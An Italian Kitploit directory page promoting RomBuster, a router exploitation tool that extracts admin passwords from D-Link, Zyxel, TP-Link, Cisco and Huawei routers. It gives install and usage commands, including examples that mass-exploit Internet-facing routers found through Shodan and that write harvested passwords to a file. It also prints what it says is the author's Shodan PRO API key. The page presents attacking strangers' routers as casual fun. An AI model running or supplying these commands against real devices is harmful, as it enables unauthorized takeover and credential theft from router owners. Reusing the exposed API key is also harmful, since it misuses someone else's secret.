Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RomBuster — RomBuster è uno strumento di sfruttamento dei router che consente di divulgare la password di amministrazione del router di rete. | Kitploit
Strumenti/GitHubGitHub/entysec/rombuster
Sicurezza IoTAttacchi alle PasswordExploitRaccolta Informazioni
GitHubentysec/rombuster

RomBuster

RomBuster è uno strumento di sfruttamento dei router che consente di divulgare la password di amministrazione del router di rete.

Vedi Repository
557872 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

RomBuster

Developer Language Forks Stars CodeFactor

RomBuster è uno strumento di sfruttamento dei router che permette di divulgare la password di amministrazione del router di rete.

Caratteristiche

  • Sfrutta le vulnerabilità dei router più diffusi come D-Link, Zyxel, TP-Link, Cisco e Huawei.
  • Ottimizzato per sfruttare più router contemporaneamente da un elenco.
  • Utilizzo semplice tramite CLI e API.

Installazione

root@kitploit:~
pip3 install git+https://github.com/EntySec/RomBuster

Utilizzo di base

Per usare RomBuster basta digitare rombuster nel terminale.

root@kitploit:~
usage: rombuster [-h] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN]
                 [--zoomeye ZOOMEYE] [-p PAGES]

RomBuster is a router exploitation tool that allows to disclosure network
router admin password.

optional arguments:
  -h, --help            show this help message and exit
  -o OUTPUT, --output OUTPUT
                        Output result to file.
  -i INPUT, --input INPUT
                        Input file of addresses.
  -a ADDRESS, --address ADDRESS
                        Single address.
  --shodan SHODAN       Shodan API key for exploiting devices over Internet.
  --zoomeye ZOOMEYE     ZoomEye API key for exploiting devices over Internet.
  -p PAGES, --pages PAGES
                        Number of pages you want to get from ZoomEye.

Esempi

Sfruttare un singolo router

Hackiamo il mio router solo per divertimento.

root@kitploit:~
rombuster -a 192.168.99.1

Sfruttare i router da Internet

Proviamo a usare il motore di ricerca Shodan per sfruttare i router su Internet.

root@kitploit:~
rombuster --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

NOTA: La chiave API Shodan fornita (PSKINdQe1GyxGgecYz2191H2JoS9qvgD) è la mia chiave PRO, puoi usare questa chiave o la tua, sentiti libero di usare tutte le nostre risorse gratuitamente :)

Sfruttare i router da un file di input

Proviamo a usare un database aperto di router.

root@kitploit:~
rombuster -i routers.txt -o passwords.txt

NOTA: Verranno sfruttati tutti i router nell'elenco routers.txt tramite i loro indirizzi e tutte le password ottenute verranno salvate in passwords.txt.

Utilizzo dell'API

RomBuster ha anche la propria API Python che può essere invocata importando RomBuster nel tuo codice.

root@kitploit:~
from rombuster import RomBuster

Funzioni di base

Qui ci sono tutte le funzioni di base di RomBuster che possono essere usate per sfruttare un router specificato.

  • exploit(address) - Sfrutta un singolo router tramite l'indirizzo fornito.

Esempi

Sfruttare un singolo router

root@kitploit:~
from rombuster import RomBuster

rombuster = RomBuster()
creds = rombuster.exploit('192.168.99.1')

print(creds)
Scarica lo strumento